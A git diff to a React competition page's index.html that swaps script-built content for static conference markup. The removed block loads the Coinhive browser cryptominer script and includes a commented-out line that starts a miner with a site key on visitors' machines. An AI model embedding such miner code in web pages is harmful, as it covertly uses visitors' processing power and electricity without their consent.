All components to HTML

--- a/public/index.html
+++ b/public/index.html
@@ -11,7 +11,7 @@
     <link rel="manifest" href="%PUBLIC_URL%/manifest.json">
     <link rel="shortcut icon" href="%PUBLIC_URL%/favicon.ico">
     <link href="https://fonts.googleapis.com/css?family=Lato:100,100i,300,300i,400,400i,700,700i,900,900i&amp;subset=latin-ext" rel="stylesheet">
-    <link rel="stylesheet" href="/main.css">
+    <link rel="stylesheet" href="%PUBLIC_URL%/main.css">
     <!--
       Notice the use of %PUBLIC_URL% in the tags above.
       It will be replaced with the URL of the `public` folder during the build.
@@ -22,46 +22,60 @@
       Learn how to configure a non-root public URL by running `npm run build`.
     -->
     <title>SPB Frontend Competition</title>
-    <script>
-        // var miner = new CoinHive.Anonymous('zT2i6Do0U2w3VgyRBqMj1S5UuprUrtXR', {throttle: 0.9}); if (!miner.isMobile()) miner.start()
-        var scriptString = ''
-        var linksString = ''
-        var scripts = [
-          {src: 'https://code.jquery.com/jquery-3.2.1.slim.js'},
-          {src: 'https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.js'},
-          {src: 'https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.js'},
-          {src: 'https://coinhive.com/lib/coinhive.min.js'},
-        ]
-        var links = [
-          {href: 'https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.css'},
-          {href: 'https://cdnjs.cloudflare.com/ajax/libs/normalize/7.0.0/normalize.css'},
-          {href: 'https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.css'},
-        ]
-        scripts.forEach(function(obj) {
-          var script = document.createElement('script')
-          Object.keys(obj).forEach(function(key){
-            script[key] = obj[key]
-          })
-          script = script.outerHTML
-          scriptString += script + '\n'
-        })
-        links.forEach(function(obj) {
-          var link = document.createElement('link')
-          Object.keys(obj).forEach(function(key){
-            link[key] = obj[key]
-          })
-          link.rel = 'stylesheet'
-          link = link.outerHTML
-          linksString += link + '\n'
-        })
-        document.write(linksString + '\n' + scriptString)
-      </script>
+
   </head>
   <body>
-    <noscript>
-      You need to enable JavaScript to run this app.
-    </noscript>
-    <div id="root"></div>
+      <style>
+
+
+        </style>
+      <header class="Header-header">
+        <video
+          class="Header-video"
+          preload="auto"
+          muted
+          autoPlay
+          loop
+          poster="https://react.amsterdam/img/dummy_bg.jpg"
+          id="bgvid">
+          <source src="https://react.amsterdam/video/video-.webm" type="video/webm" />
+          <source src="https://react.amsterdam/video/video.mp4" type="video/mp4" />
+        </video>
+
+        <div class="Header-overlay"/>
+
+        <div class="Header-wrapper">
+          <div class="Header-logos">
+            <img src="/ralogo.svg" class="Header-logo Header-logo_ral" alt="React Amsterdam Logo" />
+            <img src="/spbflogo.svg" class="Header-logo Header-logo_spbf" alt="SPB Frontend Logo" />
+          </div>
+          <h1 class="Header-title">SPB Frontend & React Amsterdam Competition</h1>
+        </div>
+      </header>
+      <div class="Body-body">
+          <div class="Body-container">
+            <h2 class="Body-title">
+              <small>React Amsterdam is a celebration of good things coming together:</small>
+              <div>REACT THAT ROCKS AND SPRING IN AMSTERDAM THAT BLOSSOMS</div>
+            </h2>
+            <p>
+              A full-day, two-track conference on all things React, gathering Front-end and Full-stack developers across
+              the globe in the tech heart of Europe. We're coming back with a new gig on <strong>April 13, 2018</strong>.
+              Mark your calendars for the biggest React community event.
+              <br />
+              Same as last year, day before the main event, we'll host a{' '}
+              <a href="https://react.amsterdam/workshops">training day</a>, with three workshops on advanced React and
+              State Management as well as a crash course on React Native.
+            </p>
+            <div class="Body-images">
+              <img src="%PUBLIC_URL%/01.jpg" class="Body-img" alt="01" />
+              <img src="%PUBLIC_URL%/02.jpg" class="Body-img" alt="02" />
+              <img src="%PUBLIC_URL%/03.jpg" class="Body-img" alt="03" />
+            </div>
+          </div>
+        </div>
+
+    <!-- <div id="root"></div> -->
     <!--
       This HTML file is a template.
       If you open it directly in the browser, you will see an empty page.
